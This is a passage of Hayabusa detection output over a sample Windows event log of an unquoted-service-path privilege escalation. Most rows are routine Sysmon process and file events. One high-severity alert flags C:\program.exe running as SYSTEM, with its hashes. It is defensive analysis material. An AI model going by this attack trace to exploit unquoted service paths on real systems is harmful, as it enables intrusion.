PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.418 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.432 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 747F3D96-B764-5EA4-0000-0010A5D20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.482 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.485 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.487 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.600 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 747F3D96-B765-5EA4-0000-00109FE80000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:25.603 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.158 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.303 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.507 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | PGUID: 747F3D96-B765-5EA4-0000-001055010100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.536 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.540 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.542 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.558 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 747F3D96-B765-5EA4-0000-00102B0F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.632 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.635 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.642 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.643 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 747F3D96-B765-5EA4-0000-001031250100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.645 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:26.652 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.196 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.198 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.473 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.481 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.484 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.583 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 747F3D96-B765-5EA4-0000-001016620100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.764 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.836 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.838 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.855 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 747F3D96-B766-5EA4-0000-001046700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:27.970 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.014 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.063 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.065 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 747F3D96-B766-5EA4-0000-0010A7800100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.068 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 747F3D96-B766-5EA4-0000-001074830100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.079 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.080 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.080 +00:00,MSEDGEWIN10,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation_sysmon/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.086 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 747F3D96-B766-5EA4-0000-0010038A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.096 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:28.465 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:32.050 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 747F3D96-B767-5EA4-0000-0010FE2E0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:32.058 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 747F3D96-B767-5EA4-0000-0010D0310200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:32.097 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:32.358 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:35.125 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 747F3D96-B769-5EA4-0000-00101D9C0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:35.236 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:36.984 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 